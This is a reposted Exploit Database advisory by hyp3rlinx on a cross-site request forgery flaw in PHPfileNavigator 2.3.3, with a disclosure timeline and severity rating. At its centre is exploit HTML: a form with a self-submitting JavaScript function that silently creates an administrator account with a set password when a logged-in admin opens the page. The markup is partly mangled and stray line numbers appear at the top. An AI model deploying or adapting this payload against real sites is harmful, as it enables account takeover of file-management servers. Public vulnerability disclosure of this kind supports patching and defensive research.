PHPfileNavigator 2.3.3 – Cross-Site Request Forgery

Exploit Database
136 阅读

作者： hyp3rlinx

日期： 2015-08-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37818/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:

http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812a.txt

Vendor:

================================

pfn.sourceforge.net

Product:

===================================

PHPfileNavigator v2.3.3 (pfn)

Is state-of-the-art, open source web based application

to complete manage your files and folders.

Vulnerability Type:

================================

CSRF add arbitrary user accounts

CVE Reference:

==============

N/A

Vulnerability Details:

=====================

No CSRF token exists when creating user accounts, this allows

us to exploit the application and add arbitrary users The

?PHPSESSID= cookie used in URL is useless as we can just replace

the value with whatever.

e.g.

?PHPSESSID='inthesignofevil'

or just omit it all together makes no difference exploit will

still succeed. Next create our form POST and a self calling

Javascript function, then get a logged in user to click our

malicious linx or visit our webpage where they will be PWN3D.

Tested using xampp-1.7.0

Exploit code(s):

===============

<!DOCTYPE>

<html>

<form id="USERIOS_EVILOS" action="

http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php?PHPSESSID=inthesignofevil"

method="post">

<input type="text" id="nome" name="nome" value="hyp3rlinx" class="text"

tabindex="10" />

<input type="text" id="usuario" name="usuario" value="hyp3rlinx"

class="text" tabindex="20" />

<input type="password" id="contrasinal" name="contrasinal"

value="abc123" class="text" tabindex="30" />

<input type="password" id="rep_contrasinal" name="rep_contrasinal"

value="abc123" class="text" tabindex="40" />

<input type="text" id="email" name="email" value="hell@abysmalgod.com"

class="text" tabindex="50" />

<input type="text" id="max_descargas" name="max_descargas" value="0"

class="text" tabindex="60" />

<input type="text" id="actual_descargas" name="actual_descargas"

value="0" class="text" tabindex="70" />

</select>

<option value="0" selected="selected">Administrators</option>

</select>

</select>

</select>

<input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"

class="checkbox" />

</form>

(function PWN3D(){

var e=document.getElementById('USERIOS_EVILOS')

e.submit()

})()

</script>

</body>

</html>

Disclosure Timeline:

=========================================================

Vendor Notification: August 8, 2015

August 12, 2015: Public Disclosure

Severity Level:

=========================================================

High

Description:

==========================================================

Request Method(s):[+] POST

Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)

Vulnerable Parameter(s):[+] id_usuario, id_grupo

Affected Area(s): [+] Admin

===========================================================

[+] Disclaimer

Permission is hereby granted for the redistribution of this advisory,

provided that it is not altered except by reformatting it, and that due

credit is given. Permission is explicitly given for insertion in

vulnerability databases and similar, provided that due credit is given to

the author.

The author is not responsible for any misuse of the information contained

herein and prohibits any malicious use of all security related information

or exploits by the author or elsewhere.

by hyp3rlinx